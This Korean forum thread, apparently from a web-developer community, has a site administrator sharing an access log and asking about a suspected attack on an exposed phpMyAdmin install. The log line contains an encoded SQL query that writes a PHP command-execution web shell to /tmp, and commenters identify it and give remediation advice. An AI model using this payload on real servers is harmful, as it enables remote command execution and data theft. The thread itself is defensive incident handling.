112.219.92.82 - - [24/Mar/2012:01:01:42 +0900] "GET /phpmyadmin/main.php?reload=1&sql_query=select+%27%3C%3Fphp+echo+%5C%27%3Cpre%3E%5C%27%3Bsystem%28%24_GET%5B%5C%27cmd%5C%27%5D%29%3B+echo+%5C%27%3C%2Fpre%3E%5C%27%3B+%3F%3E%27+INTO+OUTFILE+%27%2Ftmp%2F.a%27&token=6447c5d6e0ef4ea9a5807a9cdf775021 HTTP/1.1" 200 7428 "도메인/util/phpmyadmin/server_sql.php?token=6447c5d6e0ef4ea9a5807a9cdf775021" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.26) Gecko/20120128 Firefox/3.6.26"
위와같이 웹로그가 다수 발견되었는데요
phpmyadmin 소스 파일을 웹에서 다운받을수 있게 리스트 보이게 해둿엇는데 그경로 뒤에 이런식으로 쿼리를 남겼네요.. 굵게 표시해놓은 .a 파일이 /tmp 디렉토리에서 발견되었구요..
인젝션이나 그런형태 인건가요?
아이피 변조해서 무수히 많은 로그가 생성되었습니다 ㅠㅠ
zh-CN이건 중국이라는거같기도 하고 ㅠㅠ 조언바랍니다 ㅠㅠ 일단 그경로의 파일은 삭제햇습니다 ㅠㅠ
댓글 3개
13년 전
음....정확한건 들어가서 봐야겠지만......phpmyadmin 기본 로그가 저런식으로 남다보니...
별다른 의심점은 /tmp 에 파일이 생겼다라는건데....폴더명을 phpmysadmin 이런식으로 쓰는건
위험하구요...조치는 잘 취하신것 처럼보이네욤...
파일 삭제와 더불어 경로변경 , phpmyadmin 버전업 정도 조치 하시면 될듯 한데욤
별다른 의심점은 /tmp 에 파일이 생겼다라는건데....폴더명을 phpmysadmin 이런식으로 쓰는건
위험하구요...조치는 잘 취하신것 처럼보이네욤...
파일 삭제와 더불어 경로변경 , phpmyadmin 버전업 정도 조치 하시면 될듯 한데욤
xkingcode
13년 전
웹셀 업로드 맞네요. PHP로 보내는 명령을 바로 실행하는 PHP 파일을 만든겁니다.
일단 서버내에 파일은 다 털어갈 수 있는 상황이 되었고요.
(소스, db접속 계정 정보, DB 내용)
우선 기본적으로 비밀번호 변경하시고요.
가능한 업데이트 다 해주시고요.
웹셀 이후에 권한 탈취 시도까지는 없었던 것 같습니다만
좀비 PC 가능성도 높으니
ps aux 에서 이상한 프로세스 있으면 삭제해주세요
neststat -a 해서 정체모를 IP로부터 명령 받고있는건 없는지 확인하시고요.
phpmyadmin 경로 변경해서 다른 곳에서 쓰시고
phpmyadmin 최신 버전으로 다시 받으시고요.
MySQL은 해당 서버에서만 접근할 수 있게 IP제한 걸어주시고
PHPMyadmin도 IP 제한 걸면 좋고요.
가능하면 방화벽으로 오픈해야 하는 서비스만 오픈하심이 좋아보이십니다.
일단 서버내에 파일은 다 털어갈 수 있는 상황이 되었고요.
(소스, db접속 계정 정보, DB 내용)
우선 기본적으로 비밀번호 변경하시고요.
가능한 업데이트 다 해주시고요.
웹셀 이후에 권한 탈취 시도까지는 없었던 것 같습니다만
좀비 PC 가능성도 높으니
ps aux 에서 이상한 프로세스 있으면 삭제해주세요
neststat -a 해서 정체모를 IP로부터 명령 받고있는건 없는지 확인하시고요.
phpmyadmin 경로 변경해서 다른 곳에서 쓰시고
phpmyadmin 최신 버전으로 다시 받으시고요.
MySQL은 해당 서버에서만 접근할 수 있게 IP제한 걸어주시고
PHPMyadmin도 IP 제한 걸면 좋고요.
가능하면 방화벽으로 오픈해야 하는 서비스만 오픈하심이 좋아보이십니다.
13년 전
phpmyadmin 최신 버전으로 사용하는게 좋겠네요.
phpmyadmin 트래픽 공격도 발생하더군요.
phpmyadmin 트래픽 공격도 발생하더군요.
게시판 목록
프로그램
| 번호 | 제목 | 글쓴이 | 날짜 | 조회 |
|---|---|---|---|---|
| 4830 |
임페리얼웹
|
13년 전 | 1368 | |
| 4829 |
임페리얼웹
|
13년 전 | 720 | |
| 4828 | 13년 전 | 3483 | ||
| 4827 |
 Terrorboy |
13년 전 | 1240 | |
| 4826 | 13년 전 | 2748 | ||
| 4825 | 13년 전 | 1081 | ||
| 4824 |
gnuskin쩜net
|
13년 전 | 769 | |
| 4823 | 13년 전 | 818 | ||
| 4822 |
visualp
|
13년 전 | 683 | |
| 4821 |
다케미카코
|
13년 전 | 1261 | |
| 4820 | 13년 전 | 1347 | ||
| 4819 | 13년 전 | 2662 | ||
| 4818 |
크라이스트
|
13년 전 | 4238 | |
| 4817 |
임페리얼웹
|
13년 전 | 714 | |
| 4816 | 13년 전 | 3261 | ||
| 4815 |
하모니칼수
|
13년 전 | 651 | |
| 4814 | 13년 전 | 1112 | ||
| 4813 | 13년 전 | 710 | ||
| 4812 |
임페리얼웹
|
13년 전 | 1088 | |
| 4811 |
임페리얼웹
|
13년 전 | 1834 | |
| 4810 | 13년 전 | 1151 | ||
| 4809 | 13년 전 | 630 | ||
| 4808 | 13년 전 | 1285 | ||
| 4807 |
너는나의봄이다
|
13년 전 | 896 | |
| 4806 | 13년 전 | 1294 | ||
| 4805 | 13년 전 | 1774 | ||
| 4804 | 13년 전 | 1073 | ||
| 4803 |
한번잘해보자
|
13년 전 | 717 | |
| 4802 | 13년 전 | 1906 | ||
| 4801 |
꼬꼬아부지
|
13년 전 | 1186 | |
| 4800 | 13년 전 | 777 | ||
| 4799 |
 TopSchooL |
13년 전 | 725 | |
| 4798 | 13년 전 | 1075 | ||
| 4797 |
한번잘해보자
|
13년 전 | 615 | |
| 4796 | 13년 전 | 1723 | ||
| 4795 | 13년 전 | 1002 | ||
| 4794 |
 똥싼너구리 |
13년 전 | 1017 | |
| 4793 |
 연후하은아빠 |
13년 전 | 655 | |
| 4792 | 13년 전 | 1291 | ||
| 4791 | 13년 전 | 2100 | ||
| 4790 |
똥싼너구리 |
13년 전 | 621 | |
| 4789 |
한번잘해보자
|
13년 전 | 514 | |
| 4788 |
 넓은마인드 |
13년 전 | 689 | |
| 4787 | 13년 전 | 3286 | ||
| 4786 |
한번잘해보자
|
13년 전 | 758 | |
| 4785 | 13년 전 | 1307 | ||
| 4784 | 13년 전 | 1077 | ||
| 4783 |
 스위치79 |
13년 전 | 725 | |
| 4782 | 13년 전 | 7735 | ||
| 4781 |
크라운엠버서더
|
13년 전 | 1107 | |
| 4780 | 13년 전 | 1754 | ||
| 4779 | 13년 전 | 755 | ||
| 4778 | 13년 전 | 1088 | ||
| 4777 | 13년 전 | 919 | ||
| 4776 | 13년 전 | 1887 | ||
| 4775 | 13년 전 | 3318 | ||
| 4774 | 13년 전 | 1533 | ||
| 4773 | 13년 전 | 3241 | ||
| 4772 | 13년 전 | 1417 | ||
| 4771 | 13년 전 | 3861 | ||
| 4770 | 13년 전 | 1423 | ||
| 4769 | 13년 전 | 911 | ||
| 4768 | 13년 전 | 1885 | ||
| 4767 | 13년 전 | 2662 | ||
| 4766 | 13년 전 | 1571 | ||
| 4765 | 13년 전 | 1380 | ||
| 4764 | 13년 전 | 3140 | ||
| 4763 | 13년 전 | 1163 | ||
| 4762 |
똥싼너구리 |
13년 전 | 723 | |
| 4761 | 13년 전 | 1611 | ||
| 4760 | 13년 전 | 852 | ||
| 4759 |
NTYPE
|
13년 전 | 5177 | |
| 4758 |
프로프리랜서
|
13년 전 | 828 | |
| 4757 |
프로프리랜서
|
13년 전 | 1214 | |
| 4756 | 13년 전 | 815 | ||
| 4755 |
원시인교주
|
13년 전 | 837 | |
| 4754 |
there007
|
13년 전 | 956 | |
| 4753 | 13년 전 | 1766 | ||
| 4752 |
세상의중심
|
13년 전 | 1575 | |
| 4751 | 13년 전 | 1300 | ||
| 4750 | 13년 전 | 1500 | ||
| 4749 |
또다른세상
|
13년 전 | 3655 | |
| 4748 | 13년 전 | 769 | ||
| 4747 |
cula100jak
|
13년 전 | 1658 | |
| 4746 | 13년 전 | 1478 | ||
| 4745 |
 늘푸른등불 |
13년 전 | 618 | |
| 4744 |
designcity
|
13년 전 | 743 | |
| 4743 | 13년 전 | 621 | ||
| 4742 |
 raineye |
13년 전 | 8356 | |
| 4741 | 13년 전 | 849 | ||
| 4740 | 13년 전 | 1654 | ||
| 4739 | 13년 전 | 1324 | ||
| 4738 |
 스터디24 |
13년 전 | 751 | |
| 4737 |
Xerro
|
13년 전 | 492 | |
| 4736 | 13년 전 | 3723 | ||
| 4735 |
keith
|
13년 전 | 542 | |
| 4734 |
 ideaman |
13년 전 | 697 | |
| 4733 | 13년 전 | 1750 | ||
| 4732 |
 날라리개발자 |
13년 전 | 1249 | |
| 4731 |
늘푸른등불 |
13년 전 | 1296 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기